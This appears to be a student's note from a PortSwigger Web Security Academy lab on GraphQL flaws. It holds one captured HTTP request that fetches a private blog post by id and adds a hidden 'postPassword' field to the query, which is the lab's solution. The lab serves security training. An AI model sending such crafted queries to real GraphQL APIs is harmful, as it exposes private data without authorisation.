Lab: Accessing private GraphQL posts

https://portswigger.net/web-security/learning-paths/graphql-api-vulnerabilities/discovering-schema-information/graphql/lab-graphql-reading-private-posts

POST /graphql/v1 HTTP/2
Host: 0a57008d044f993b80b30d6200320080.web-security-academy.net
Cookie: session=6GlO2KZ7sMbL3ElSRzZchkPZYlnRWelM
Content-Length: 275
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: de-DE,de;q=0.9
Accept: application/json
Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Origin: https://0a57008d044f993b80b30d6200320080.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a57008d044f993b80b30d6200320080.web-security-academy.net/post?postId=4
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"query":"\n    query getBlogPost($id: Int!) {\n        getBlogPost(id: $id) {\n            image\n            title\n            author\n            date\n            paragraphs\n            postPassword\n        }\n    }","operationName":"getBlogPost","variables":{"id":3}}